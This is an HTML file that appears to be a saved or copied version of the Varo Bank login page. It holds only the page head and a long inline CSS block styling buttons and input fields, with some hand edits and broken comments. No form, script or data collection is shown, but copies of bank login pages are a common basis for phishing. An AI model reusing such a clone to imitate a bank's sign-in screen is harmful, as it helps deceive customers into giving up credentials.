<!DOCTYPE html>
<html lang="en" style="--vh: 6.53px;">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <link rel="stylesheet" type="text/css" href="cid:css-478faa2a-0709-4d7f-8427-288ddaeeb62e@mhtml.blink" />
      <link rel="stylesheet" type="text/css" href="cid:css-7be94722-64a8-4fa0-bf79-92ac33a509ca@mhtml.blink" />
      <link rel="stylesheet" type="text/css" href="cid:css-1f9e9219-0a9f-47df-9191-39e09e878013@mhtml.blink" />
      <title>Log In - Varo Bank</title>
        <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="apple-mobile-web-app-title" content="Varo Bank">
      <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">
      <link rel="icon" href="https://bank.varomoney.com/favicon.png">  <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js'></script>
    
      
   </head>
   <style>
@charset "utf-8";
@font-face { font-family: National-2-Compressed; src: url("/assets/fonts/National2CompressedBold.woff2") format("truetype"); font-weight: bold; font-style: normal; }
@font-face { font-family: Neue-Haas-Grotesk-Display-Pro; src: url("/assets/fonts/NeueHaasGroteskDisplayProRomanNormal.woff2") format("truetype"); font-weight: 450; font-style: normal; }
@font-face { font-family: Neue-Haas-Grotesk-Display-Pro; src: url("/assets/fonts/NeueHaasGroteskDisplayProMediumNormal.woff2") format("truetype"); font-weight: 500; font-style: normal; }
@font-face { font-family: Neue-Haas-Grotesk-Display-Pro; src: url("/assets/fonts/NeueHaasGroteskDisplayProMediumNormal.woff2") format("truetype"); font-weight: bold; font-style: normal; }
@font-face { font-family: Neue-Haas-Grotesk-Display-Pro; src: url("/assets/fonts/NeueHaasGroteskDisplayProMediumNormal.woff2") format("truetype"); }
@font-face { font-family: aktiv-grotesk; src: url("/assets/fonts/AktivGrotesk_A_Rg.ttf") format("truetype"); font-weight: normal; font-style: normal; }
@font-face { font-family: aktiv-grotesk; src: url("/assets/fonts/AktivGrotesk_A_Md.ttf") format("truetype"); font-weight: 500; font-style: normal; }
@font-face { font-family: aktiv-grotesk; src: url("/assets/fonts/AktivGrotesk_A_Bd.ttf") format("truetype"); font-weight: bold; font-style: normal; }
@font-face { font-family: aktiv-grotesk-wide; src: url("/assets/fonts/AktivGroteskEx_A_Bd.ttf") format("truetype"); }
@font-face { font-family: Varo-Hand; src: url("/assets/fonts/VaroHand.woff2") format("truetype"); }
@charset "utf-8";
html { font-size: 62.5%; }
body { overflow-x: hidden; background: rgb(239, 242, 245) !important; color: rgb(28, 28, 28) !important; font-family: Neue-Haas-Grotesk-Display-Pro, aktiv-grotesk, helvetica, arial, "sans-serif" !important; font-weight: 450 !important; font-size: 1.6rem !important; overflow-y: auto !important; padding: 0px !important; }
p { margin-bottom: 1.6rem; margin-top: 1.6rem; }
a { color: rgb(28, 28, 28); cursor: pointer; text-decoration: none; }
a:hover { color: rgb(140, 88, 208); }
p a { text-decoration: underline; }
iframe.pinwheel-portal { z-index: 10; }
@charset "utf-8";
.leICiZ { margin: 0px; font-weight: 400; line-height: 1.5; letter-spacing: 0.00938em; font-size: 16px; font-family: Neue-Haas-Grotesk-Display-Pro, helvetica, arial, "sans-serif", helvetica, arial, "sans-serif" !important; }
.dDVxmS { margin: 0px; font-family: Roboto, Helvetica, Arial, sans-serif; font-weight: 400; font-size: 1rem; line-height: 1.5; letter-spacing: 0.00938em; }
.jmwJem { -webkit-box-align: center; align-items: center; background: rgb(255, 255, 255); display: flex; flex-direction: column; -webkit-box-pack: center; justify-content: center; position: fixed; inset: 0px; padding-bottom: 120px; z-index: 999; line-height: 1.5; }
.hDmrvg.hDmrvg { font-weight: 700; font-size: 32px; line-height: 26px; text-transform: uppercase; color: rgb(140, 88, 208); display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; font-family: National-2-Compressed, helvetica, arial, "sans-serif", helvetica, arial, "sans-serif" !important; }
.cAXluU { display: inline-block; color: rgb(25, 118, 210); animation: 1.4s linear 0s infinite normal none running epmXAj; }
.gorkCg { display: block; }
.htcbaI { stroke: currentcolor; stroke-dasharray: 80px, 200px; stroke-dashoffset: 0; animation: 1.4s ease-in-out 0s infinite normal none running jzfMP; }
.ebiziq { text-align: center; }
.ebiziq .MuiCircularProgress-svg { color: rgb(140, 88, 208); }
.kRfUwV { display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; position: relative; box-sizing: border-box; -webkit-tap-highlight-color: transparent; background-color: transparent; outline: 0px; border: 0px; margin: 0px; border-radius: 0px; padding: 0px; cursor: pointer; user-select: none; vertical-align: middle; appearance: none; text-decoration: none; color: inherit; }
.kRfUwV.Mui-disabled { pointer-events: none; cursor: default; }
@media print {
.kRfUwV { }
}
.bHUge { text-transform: uppercase; padding: 6px 16px; box-shadow: rgba(0, 0, 0, 0.2) 0px 3px 1px -2px, rgba(0, 0, 0, 0.14) 0px 2px 2px 0px, rgba(0, 0, 0, 0.12) 0px 1px 5px 0px; border-radius: 4px; font-size: 14px; font-weight: 500; height: 40px; letter-spacing: 0.05em; line-height: 1; min-width: 128px; transition: all 0.25s cubic-bezier(0.4, 0, 0.2, 1) 0s; width: 100%; z-index: 1; background: rgb(140, 88, 208); color: rgb(255, 255, 255); font-family: Neue-Haas-Grotesk-Display-Pro, helvetica, arial, "sans-serif", helvetica, arial, "sans-serif" !important; }
.bHUge:hover { text-decoration: none; background-color: rgb(21, 101, 192); box-shadow: rgba(0, 0, 0, 0.2) 0px 2px 4px -1px, rgba(0, 0, 0, 0.14) 0px 4px 5px 0px, rgba(0, 0, 0, 0.12) 0px 1px 10px 0px; }
@media (hover: none) {
.bHUge:hover { background-color: rgb(25, 118, 210); }
}
.bHUge:active { box-shadow: rgba(0, 0, 0, 0.2) 0px 5px 5px -3px, rgba(0, 0, 0, 0.14) 0px 8px 10px 1px, rgba(0, 0, 0, 0.12) 0px 3px 14px 2px; }
.bHUge.Mui-focusVisible { box-shadow: rgba(0, 0, 0, 0.2) 0px 3px 5px -1px, rgba(0, 0, 0, 0.14) 0px 6px 10px 0px, rgba(0, 0, 0, 0.12) 0px 1px 18px 0px; }
.bHUge.Mui-disabled { color: rgba(0, 0, 0, 0.26); box-shadow: none; background-color: rgba(0, 0, 0, 0.12); }
@media (min-width: 900px) {
.bHUge { width: auto; }
}
.bHUge .hover, .bHUge .focus, .bHUge .active, .bHUge .disabled { border-radius: 4px; top: 0px; left: 0px; opacity: 0; transition: opacity 0.25s cubic-bezier(0.4, 0, 0.2, 1) 0s; z-index: -1; position: absolute; width: 100%; height: 100%; }
.bHUge:hover .hover, .bHUge:focus:not(:active) .focus, .bHUge:focus:active .active, .bHUge:active .active, .bHUge.Mui-disabled .disabled { opacity: 1; }
.bHUge svg { color: rgb(255, 255, 255); }
.bHUge.Mui-disabled svg { color: rgb(255, 255, 255); }
.bHUge:hover, .bHUge:focus, .bHUge:active { color: rgb(255, 255, 255); }
.bHUge .hover { background: rgb(119, 75, 176); }
.bHUge .focus { background: rgb(119, 75, 176); }
.bHUge:active { box-shadow: none !important; }
.bHUge .active { background: rgb(103, 65, 154); }
.bHUge:not(.Mui-disabled) svg { color: rgb(255, 255, 255); }
.bHUge.Mui-disabled .disabled { background: rgb(237, 230, 253); }
.bHUge.Mui-disabled .MuiButton-label { background-color: rgb(255, 255, 255); }
.hfGvdV { text-transform: uppercase; border-radius: 4px; color: rgb(28, 28, 28); font-size: 14px; font-weight: 500; letter-spacing: 0.05em; line-height: 1; transition: all 0.25s cubic-bezier(0.4, 0, 0.2, 1) 0s; z-index: 1; height: 24px; min-width: 0px; padding: 0px; width: auto; font-family: Neue-Haas-Grotesk-Display-Pro, helvetica, arial, "sans-serif", helvetica, arial, "sans-serif" !important; background: none !important; }
.hfGvdV:hover { text-decoration: none; background-color: rgba(25, 118, 210, 0.04); }
@media (hover: none) {
.hfGvdV:hover { background-color: transparent; }
}
.hfGvdV.Mui-disabled { color: rgba(0, 0, 0, 0.26); }
@media (min-width: 900px) {
.hfGvdV { width: auto; }
}
.hfGvdV .hover, .hfGvdV .focus, .hfGvdV .active, .hfGvdV .disabled { border-radius: 4px; top: 0px; left: 0px; opacity: 0; transition: opacity 0.25s cubic-bezier(0.4, 0, 0.2, 1) 0s; z-index: -1; position: absolute; width: 100%; height: 100%; }
.hfGvdV:hover .hover, .hfGvdV:focus:not(:active) .focus, .hfGvdV:focus:active .active, .hfGvdV:active .active, .hfGvdV.Mui-disabled .disabled { opacity: 1; }
.hfGvdV svg { color: rgb(255, 255, 255); }
.hfGvdV.Mui-disabled svg { color: rgb(255, 255, 255); }
.gsWiyV { text-transform: uppercase; padding: 6px 16px; box-shadow: rgba(0, 0, 0, 0.2) 0px 3px 1px -2px, rgba(0, 0, 0, 0.14) 0px 2px 2px 0px, rgba(0, 0, 0, 0.12) 0px 1px 5px 0px; border-radius: 4px; font-size: 14px; font-weight: 500; height: 40px; letter-spacing: 0.05em; line-height: 1; min-width: 128px; transition: all 0.25s cubic-bezier(0.4, 0, 0.2, 1) 0s; width: 100%; z-index: 1; background: rgb(140, 88, 208); color: rgb(255, 255, 255); font-family: Neue-Haas-Grotesk-Display-Pro, helvetica, arial, "sans-serif", helvetica, arial, "sans-serif" !important; }
.gsWiyV:hover { text-decoration: none; background-color: rgb(21, 101, 192); box-shadow: rgba(0, 0, 0, 0.2) 0px 2px 4px -1px, rgba(0, 0, 0, 0.14) 0px 4px 5px 0px, rgba(0, 0, 0, 0.12) 0px 1px 10px 0px; }
@media (hover: none) {
.gsWiyV:hover { background-color: rgb(25, 118, 210); }
}
.gsWiyV:active { box-shadow: rgba(0, 0, 0, 0.2) 0px 5px 5px -3px, rgba(0, 0, 0, 0.14) 0px 8px 10px 1px, rgba(0, 0, 0, 0.12) 0px 3px 14px 2px; }
.gsWiyV.Mui-focusVisible { box-shadow: rgba(0, 0, 0, 0.2) 0px 3px 5px -1px, rgba(0, 0, 0, 0.14) 0px 6px 10px 0px, rgba(0, 0, 0, 0.12) 0px 1px 18px 0px; }
.gsWiyV.Mui-disabled { color: rgba(0, 0, 0, 0.26); box-shadow: none; background-color: rgba(0, 0, 0, 0.12); }
@media (min-width: 900px) {
.gsWiyV { width: auto; }
}
.gsWiyV .hover, .gsWiyV .focus, .gsWiyV .active, .gsWiyV .disabled { border-radius: 4px; top: 0px; left: 0px; opacity: 0; transition: opacity 0.25s cubic-bezier(0.4, 0, 0.2, 1) 0s; z-index: -1; position: absolute; width: 100%; height: 100%; }
.gsWiyV:hover .hover, .gsWiyV:focus:not(:active) .focus, .gsWiyV:focus:active .active, .gsWiyV:active .active, .gsWiyV.Mui-disabled .disabled { opacity: 1; }
.gsWiyV svg { color: rgb(255, 255, 255); }
.gsWiyV.Mui-disabled svg { color: rgb(255, 255, 255); }
.gsWiyV:hover, .gsWiyV:focus, .gsWiyV:active { color: rgb(255, 255, 255); }
.gsWiyV .hover { background: rgb(119, 75, 176); }
.gsWiyV .focus { background: rgb(119, 75, 176); }
.gsWiyV:active { box-shadow: none !important; }
.gsWiyV .active { background: rgb(103, 65, 154); }
.gsWiyV:not(.Mui-disabled) svg { color: rgb(255, 255, 255); }
.gsWiyV.Mui-disabled .disabled { background: rgb(237, 230, 253); }
.gsWiyV.Mui-disabled .MuiButton-label { background-color: rgb(255, 255, 255); }
.gmnxUG { margin: 0px 4px 0px 0px; }
.hJvjQu.MuiButtonBase-root { border-radius: 4px; display: inline-flex; width: auto; min-height: 40px; box-shadow: none !important; }
.hJvjQu.MuiButtonBase-root.MuiButton-sizeSmall { height: 32px; min-height: 32px; }
.hJvjQu.MuiButtonBase-root.MuiButton-fullWidth { width: 100%; }
.hJvjQu.MuiButton-root { border-radius: 4px; color: rgb(255, 255, 255); font-family: Neue-Haas-Grotesk-Display-Pro, helvetica, arial, "sans-serif"; letter-spacing: 0.02em; text-transform: none; box-shadow: none !important; }
.hJvjQu.MuiButton-contained:not(.loading).Mui-disabled .disabled { background: rgb(220, 223, 225); color: rgb(174, 174, 174); box-shadow: none !important; }
.hJvjQu.MuiButton-outlined { background: transparent; border: 1px solid rgb(28, 28, 28); color: inherit; }
.hJvjQu.MuiButton-outlined:hover { border: 1px solid rgb(28, 28, 28); background-color: transparent; }
.hJvjQu.MuiButton-outlined svg { color: rgb(28, 28, 28); }
.hJvjQu.MuiButton-outlined.loading svg { color: rgb(28, 28, 28); }
.hJvjQu.MuiButton-outlined.MuiButton-outlinedWarning { border: 1px solid rgb(28, 28, 28); color: rgb(28, 28, 28); }
.hJvjQu.MuiButton-outlined.MuiButton-outlinedSuccess, .hJvjQu.MuiButton-outlined.MuiButton-outlinedError, .hJvjQu.MuiButton-outlined.MuiButton-outlinedInfo { border: 1px solid rgb(255, 255, 255); color: rgb(255, 255, 255); }
.hJvjQu.MuiButton-outlined.MuiButton-outlinedSuccess:hover, .hJvjQu.MuiButton-outlined.MuiButton-outlinedError:hover, .hJvjQu.MuiButton-outlined.MuiButton-outlinedInfo:hover { border: 1px solid rgb(255, 255, 255); background-color: transparent; }
.hJvjQu.MuiButton-outlined.MuiButton-outlinedSuccess svg, .hJvjQu.MuiButton-outlined.MuiButton-outlinedError svg, .hJvjQu.MuiButton-outlined.MuiButton-outlinedInfo svg { color: rgb(255, 255, 255); }
.hJvjQu.MuiButton-outlined.MuiButton-outlinedSuccess.loading svg, .hJvjQu.MuiButton-outlined.MuiButton-outlinedError.loading svg, .hJvjQu.MuiButton-outlined.MuiButton-outlinedInfo.loading svg { color: rgb(255, 255, 255); }
.hJvjQu.MuiButton-containedPrimary { background: rgb(140, 88, 208); border: 1px solid rgb(140, 88, 208); color: rgb(255, 255, 255); border-radius: 4px; }
.hJvjQu.MuiButton-containedPrimary.loading { background: rgb(140, 88, 208); }
.hJvjQu.MuiButton-containedPrimary:hover { background-color: rgb(119, 75, 176); border: 1px solid rgb(119, 75, 176); box-shadow: none; }
.hJvjQu.MuiButton-containedPrimary:focus { background-color: rgb(103, 65, 154); border: 1px solid rgb(103, 65, 154); box-shadow: none; }
.hJvjQu.MuiButton-containedPrimary:active { box-shadow: none; background-color: rgb(103, 65, 154); border: 1px solid rgb(103, 65, 154); }
.hJvjQu.MuiButton-containedPrimary:not(.loading).Mui-disabled { background: rgb(220, 223, 225); border: 1px solid rgb(220, 223, 225); color: rgb(174, 174, 174); }
.hJvjQu.MuiButton-containedPrimary:not(.loading).Mui-disabled:disabled { background: rgb(220, 223, 225); border: 1px solid rgb(220, 223, 225); color: rgb(174, 174, 174); }
.hJvjQu.MuiButton-containedPrimary:not(.loading).Mui-disabled.MuiButton-label { background-color: rgb(220, 223, 225); }
.hJvjQu.MuiButton-containedTextColor { color: rgb(140, 88, 208); background: none; }
.hJvjQu.MuiButton-containedTextColor.loading svg { color: rgb(140, 88, 208); }
.hJvjQu.MuiButton-containedTextColor:hover { background: none; color: rgb(119, 75, 176); }
.hJvjQu.MuiButton-containedTextColor:focus { background: none; color: rgb(103, 65, 154); }
.hJvjQu.MuiButton-containedTextColor:active { background: none; color: rgb(103, 65, 154); }
.hJvjQu.MuiButton-containedTextColor:not(.loading).Mui-disabled { color: rgb(174, 174, 174); background: none !important; }
.hJvjQu.MuiButton-containedTextColor:not(.loading).Mui-disabled:disabled { background: none; color: rgb(174, 174, 174); }
.hJvjQu.MuiButton-containedTextColor:not(.loading).Mui-disabled.MuiButton-label { background: none; }
.hJvjQu.MuiButton-containedSecondary { color: rgb(140, 88, 208); background: none; border: 1px solid rgb(140, 88, 208); border-radius: 4px; box-shadow: none; }
.hJvjQu.MuiButton-containedSecondary.loading { background: rgb(255, 255, 255); }
.hJvjQu.MuiButton-containedSecondary.loading svg { color: rgb(140, 88, 208); }
.hJvjQu.MuiButton-containedSecondary svg { color: rgb(140, 88, 208); }
.hJvjQu.MuiButton-containedSecondary:hover { background: none; color: rgb(119, 75, 176); border: 1px solid rgb(119, 75, 176); box-shadow: none; border-radius: 4px; }
.hJvjQu.MuiButton-containedSecondary:focus { background: none; color: rgb(103, 65, 154); border: 1px solid rgb(103, 65, 154); box-shadow: none; border-radius: 4px; }
.hJvjQu.MuiButton-containedSecondary:active { background: none; color: rgb(103, 65, 154); border: 1px solid rgb(103, 65, 154); border-radius: 4px; box-shadow: none; }
.hJvjQu.MuiButton-containedSecondary:not(.loading).Mui-disabled { color: rgb(174, 174, 174); border: 1px solid rgb(220, 223, 225); background: none !important; }
.hJvjQu.MuiButton-containedSecondary:not(.loading).Mui-disabled:disabled { background: none; color: rgb(174, 174, 174); border: 1px solid rgb(220, 223, 225); border-radius: 4px; }
.hJvjQu.MuiButton-containedSecondary:not(.loading).Mui-disabled.MuiButton-label { background: none; border-radius: 4px; }
.hJvjQu.MuiButton-containedLight { color: rgb(28, 28, 28); background: rgb(255, 255, 255); border: none; border-radius: 4px; box-shadow: none; }
.hJvjQu.MuiButton-containedLight.loading { background: rgb(255, 255, 255); }
.hJvjQu.MuiButton-containedLight.loading svg { color: rgb(28, 28, 28); }
.hJvjQu.MuiButton-containedLight svg { color: rgb(28, 28, 28); }
.hJvjQu.MuiButton-containedLight:hover { background-color: rgba(255, 255, 255, 0.92); border: none; box-shadow: none; border-radius: 4px; }
.hJvjQu.MuiButton-containedLight:focus { background-color: rgba(255, 255, 255, 0.84); color: rgb(28, 28, 28); border: 1px solid rgb(237, 230, 253); box-shadow: none; border-radius: 4px; }
.hJvjQu.MuiButton-containedLight:active { background-color: rgba(255, 255, 255, 0.84); color: rgb(28, 28, 28); border: none; border-radius: 4px; box-shadow: none; }
.hJvjQu.MuiButton-containedLight:not(.loading).Mui-disabled { background: rgba(255, 255, 255, 0.4); color: rgb(174, 174, 174); border: none; }
.hJvjQu.MuiButton-containedLight:not(.loading).Mui-disabled:disabled { background: rgba(255, 255, 255, 0.4); color: rgb(174, 174, 174); border: none; border-radius: 4px; }
.hJvjQu.MuiButton-containedLight:not(.loading).Mui-disabled.MuiButton-label { background: rgb(174, 174, 174); border-radius: 4px; }
.hJvjQu.MuiButton-outlinedLight { color: rgb(255, 255, 255); border: 1px solid rgb(255, 255, 255); }
.hJvjQu.MuiButton-outlinedLight:hover { color: rgb(255, 255, 255); border: 1px solid rgba(255, 255, 255, 0.92); }
.hJvjQu.MuiButton-outlinedLight:focus { color: rgb(255, 255, 255); border: 1px solid rgb(237, 230, 253); }
.hJvjQu.MuiButton-outlinedLight:active { border: 1px solid rgb(237, 230, 253); color: rgb(255, 255, 255); }
.hJvjQu.MuiButton-outlinedLight.loading { border: 1px solid rgba(255, 255, 255, 0.92); }
.hJvjQu.MuiButton-outlinedLight.loading svg { color: rgb(255, 255, 255); }
.hJvjQu.MuiButton-outlinedLight:not(.loading).Mui-disabled { border: 1px solid rgb(174, 174, 174); color: rgb(174, 174, 174); }
.hJvjQu.MuiButton-outlinedLight:not(.loading).Mui-disabled:disabled { color: rgb(174, 174, 174); border: 1px solid rgb(174, 174, 174); }
.hJvjQu.MuiButton-text { background: none; color: rgb(140, 88, 208); min-height: 0px; }
.hJvjQu.MuiButton-text svg { color: rgb(140, 88, 208) !important; }
.hJvjQu.MuiButton-text:hover { color: rgb(119, 75, 176); }
.hJvjQu.MuiButton-text:hover svg { color: rgb(119, 75, 176) !important; }
.hJvjQu.MuiButton-text:focus, .hJvjQu.MuiButton-text:active { color: rgb(103, 65, 154); }
.hJvjQu.MuiButton-text:focus svg, .hJvjQu.MuiButton-text:active svg { color: rgb(103, 65, 154) !important; }
.hJvjQu.MuiButton-text.loading svg { color: rgb(140, 88, 208); }
.hJvjQu.MuiButton-text:not(.loading).Mui-disabled { color: rgb(174, 174, 174); }
.hJvjQu.MuiButton-textLight { background: none; color: rgb(255, 255, 255); }
.hJvjQu.MuiButton-textLight svg { color: rgb(255, 255, 255) !important; }
.hJvjQu.MuiButton-textLight:hover { color: rgb(255, 255, 255); }
.hJvjQu.MuiButton-textLight:hover svg { color: rgb(255, 255, 255) !important; }
.hJvjQu.MuiButton-textLight:focus, .hJvjQu.MuiButton-textLight:active { color: rgba(255, 255, 255, 0.84); }
.hJvjQu.MuiButton-textLight:focus svg, .hJvjQu.MuiButton-textLight:active svg { color: rgba(255, 255, 255, 0.84) !important; }
.hJvjQu.MuiButton-textLight.loading svg { color: rgba(255, 255, 255, 0.84); }
.hJvjQu.MuiButton-textLight:not(.loading).Mui-disabled { color: rgb(174, 174, 174); }
.hJvjQu.MuiButton-textPrimary { color: rgb(140, 88, 208); }
.fiKkqm { font-weight: 400; font-size: 1rem; line-height: 1.4375em; letter-spacing: 0.00938em; color: rgb(28, 28, 28); box-sizing: border-box; position: relative; cursor: text; display: inline-flex; -webkit-box-align: center; align-items: center; width: 100%; border-width: 1px; font-family: Neue-Haas-Grotesk-Display-Pro, helvetica, arial, "sans-serif", helvetica, arial, "sans-serif" !important; }
.fiKkqm.Mui-disabled { color: rgba(0, 0, 0, 0.38); cursor: default; }
.gcFGJP { font-style: inherit; font-variant: inherit; font-stretch: inherit; line-height: inherit; font-optical-sizing: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; letter-spacing: inherit; border: 0px; box-sizing: content-box; background: none; margin: 0px; -webkit-tap-highlight-color: transparent; display: block; min-width: 0px; width: 100%; animation-name: mui-auto-fill-cancel; animation-duration: 10ms; color: rgb(28, 28, 28); font-size: 16px; height: 24px; font-weight: 450; padding: 8px 0px; font-family: Neue-Haas-Grotesk-Display-Pro, helvetica, arial, "sans-serif", helvetica, arial, "sans-serif" !important; }
.gcFGJP::-webkit-input-placeholder { color: currentcolor; opacity: 0.42; transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; }
.gcFGJP:focus { outline: 0px; }
.gcFGJP:invalid { box-shadow: none; }
.gcFGJP::-webkit-search-decoration { appearance: none; }
label[data-shrink="false"] + .MuiInputBase-formControl .sc-fEOsli::-webkit-input-placeholder { opacity: 0 !important; }
label[data-shrink="false"] + .MuiInputBase-formControl .sc-fEOsli:focus::-webkit-input-placeholder { opacity: 0.42; }
.gcFGJP.Mui-disabled { opacity: 1; -webkit-text-fill-color: rgba(0, 0, 0, 0.38); }
.gcFGJP:-webkit-autofill { animation-duration: 5000s; animation-name: mui-auto-fill; }
.gcFGJP::-webkit-input-placeholder { opacity: 1; }
.gcFGJP::placeholder { opacity: 1; }
.gcFGJP:focus { color: rgb(28, 28, 28); }
.gcFGJP.Mui-disabled { color: rgb(174, 174, 174); }
.ccggEv { position: relative; }
label + .sc-bjUoiL { margin-top: 16px; }
/*.ccggEv::after { border-bottom: 2px solid rgb(25, 118, 210); left: 0px; bottom: 0px; content: ""; position: absolute; right: 0px; transform: scaleX(0); transition: transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms; pointer-events: none; }
.ccggEv.Mui-focused::after { transform: scaleX(1) translateX(0px); }
.ccggEv.Mui-error::after { border-bottom-color: rgb(211, 47, 47); transform: scaleX(1); }
.ccggEv::before { border-bottom: 1px solid rgba(0, 0, 0, 0.42); left: 0px; bottom: 0px; content: " "; position: absolute; right: 0px; transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; pointer-events: none; }
/.ccggEv:hover:not(.Mui-disabled)::before { border-bottom: 2px solid rgb(28, 28, 28); }*/
@media (hover: none) {
.ccggEv:hover:not(.Mui-disabled)::before { border-bottom: 1px solid rgba(0, 0, 0, 0.42); }
}
.ccggEv.Mui-disabled::before { border-bottom-style: dotted; }
label + .sc-bjUoiL { margin-top: 8px; }
.ccggEv::before { border-bottom: 1px solid rgba(0, 28, 45, 0.14); }
.ccggEv::after { border-bottom: 1px solid rgb(66, 24, 95); }
.ccggEv:hover:not(.Mui-disabled)::before { border-bottom: 1px solid rgb(66, 24, 95); }*/
.ccggEv.Mui-disabled::before { border-bottom: 1px solid rgb(237, 230, 253); }
.ccggEv.Mui-error::after { border-bottom-color: rgb(212, 67, 38); }*/
.ccggEv{border-bottom:1px solid blue; color:blue;}
.ioyUhk { font-weight: 400; line-height: 1.4375em; letter-spacing: 0.00938em; padding: 0px; position: relative; color: rgb(28, 28, 28); font-size: 16px; z-index: 2; font-family: Neue-Haas-Grotesk-Display-Pro, helvetica, arial, "sans-serif", helvetica, arial, "sans-serif" !important; }
.ioyUhk.Mui-focused { color: rgb(25, 118, 210); }
.ioyUhk.Mui-disabled { color: rgba(0, 0, 0, 0.38); }
.ioyUhk.Mui-error { color: rgb(211, 47, 47); }
.ioyUhk:not(.MuiButton-textError).Mui-focused { color: rgb(140, 88, 208); }
.ioyUhk.MuiButton-textError { color: rgb(212, 67, 38); }
.ioyUhk.Mui-disabled { color: rgb(174, 174, 174); }
.SaErs { display: block; transform-origin: left top; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; max-width: 100%; position: absolute; left: 0px; top: 0px; transition: color 200ms cubic-bezier(0, 0, 0.2, 1) 0ms, transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms, max-width 200ms cubic-bezier(0, 0, 0.2, 1) 0ms; height: 16px; line-height: 16px; font-size: 16px; font-weight: 450; transform: translate(0px, 21px) scale(1); }
.eBmjBn { display: inline-flex; flex-direction: column; position: relative; min-width: 0px; padding: 0px; margin: 0px; border: 0px; vertical-align: top; width: 100%; min-height: 72px; }
.cwmbCj { user-select: none; display: inline-block; fill: currentcolor; flex-shrink: 0; transition: fill 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; font-size: 1.5rem; height: 24px; width: 24px; font-family: Neue-Haas-Grotesk-Display-Pro, helvetica, arial, "sans-serif", helvetica, arial, "sans-serif" !important; }
.ddorge.ddorge { color: rgb(140, 88, 208); text-decoration: underline; }
.ddorge.ddorge:hover { color: rgb(126, 86, 194); }
.ddorge.ddorge:active { color: rgb(94, 53, 177); }
.eXVVSn { text-align: center; flex: 0 0 auto; font-size: 1.5rem; border-radius: 50%; overflow: visible; color: rgba(0, 0, 0, 0.54); transition: background-color 150ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; padding: 8px; }
.eXVVSn.Mui-disabled { background-color: transparent; color: rgba(0, 0, 0, 0.26); }
.eXVVSn:focus:not(:active) .focus { color: rgb(28, 28, 28); }
.eXVVSn:focus:not(:active) { color: rgb(28, 28, 28); }
.eXVVSn:hover:not(:active) { color: rgb(28, 28, 28); }
.eXVVSn:hover:not(:active) .hover { color: rgb(28, 28, 28); }
.eXVVSn:active { color: rgb(28, 28, 28); }
.eXVVSn .active { color: rgb(28, 28, 28); }
.kXakMB { position: absolute; left: 0px; right: 0px; top: 400px; margin-left: auto; margin-right: auto; width: 40px; z-index: 1; }
.iePOde { background-color: rgb(255, 255, 255); opacity: 0.2; }
@media print {
.fRefAR { position: absolute !important; }
}
@media (min-width: 960px) {
.jvmFTg .MuiPaper-rounded { border-radius: 8px !important; }
.jvmFTg.wide .MuiPaper-root { max-width: 950px !important; }
}
@media (max-width: 959px) {
.jvmFTg.jvmFTg { z-index: 10 !important; top: 64px !important; }
.jvmFTg.jvmFTg .MuiBackdrop-root { top: 64px !important; }
}
.kBGFCo { box-sizing: border-box; display: flex; flex-flow: wrap; width: 100%; }
.dkqayb { box-sizing: border-box; margin: 0px; flex-direction: row; flex-basis: 100%; -webkit-box-flex: 0; flex-grow: 0; max-width: 100%; }
@media (min-width: 600px) {
.dkqayb { flex-basis: 100%; -webkit-box-flex: 0; flex-grow: 0; max-width: 100%; }
}
@media (min-width: 900px) {
.dkqayb { flex-basis: 100%; -webkit-box-flex: 0; flex-grow: 0; max-width: 100%; }
}
@media (min-width: 1200px) {
.dkqayb { flex-basis: 100%; -webkit-box-flex: 0; flex-grow: 0; max-width: 100%; }
}
@media (min-width: 1536px) {
.dkqayb { flex-basis: 100%; -webkit-box-flex: 0; flex-grow: 0; max-width: 100%; }
}
.drqAls { box-sizing: border-box; display: flex; flex-flow: wrap; width: 100%; -webkit-box-pack: center; justify-content: center; }
.bbZMtL { box-sizing: border-box; margin: 0px; flex-direction: row; flex-basis: 100%; -webkit-box-flex: 0; flex-grow: 0; max-width: 100%; }
@media (min-width: 600px) {
.bbZMtL { flex-basis: 100%; -webkit-box-flex: 0; flex-grow: 0; max-width: 100%; }
}
@media (min-width: 900px) {
.bbZMtL { flex-basis: 58.3333%; -webkit-box-flex: 0; flex-grow: 0; max-width: 58.3333%; }
}
@media (min-width: 1200px) {
.bbZMtL { flex-basis: 58.3333%; -webkit-box-flex: 0; flex-grow: 0; max-width: 58.3333%; }
}
@media (min-width: 1536px) {
.bbZMtL { flex-basis: 58.3333%; -webkit-box-flex: 0; flex-grow: 0; max-width: 58.3333%; }
}
.cQbegO { display: flex; height: 0.01em; max-height: 2em; -webkit-box-align: center; align-items: center; white-space: nowrap; color: rgba(0, 0, 0, 0.54); margin-left: 8px; }
.kRZyJ { background-color: rgb(239, 242, 245); }
.kRZyJ:focus { outline: none; }
.fcSMzJ { background-color: rgb(255, 255, 255); }
.fcSMzJ:focus { outline: none; }
.fwqJZF { margin: 0px auto; max-width: 1312px; width: 100%; }
.fwqJZF:not(:focus-within) { height: 1px; width: 1px; overflow: hidden; clip: rect(1px, 1px, 1px, 1px); white-space: nowrap; position: absolute !important; }
.gDuwAi { position: absolute; margin-left: 16px; top: 74px; z-index: 2; text-transform: none !important; }
.gDuwAi:not(:focus) { height: 1px; width: 1px; overflow: hidden; clip: rect(1px, 1px, 1px, 1px); white-space: nowrap; position: absolute !important; }
@media (max-width: 959px) {
.gDuwAi { width: auto; top: 64px; }
}
html { -webkit-font-smoothing: antialiased; box-sizing: border-box; text-size-adjust: 100%; }
*, ::before, ::after { box-sizing: inherit; }
strong, b { font-weight: 700; }
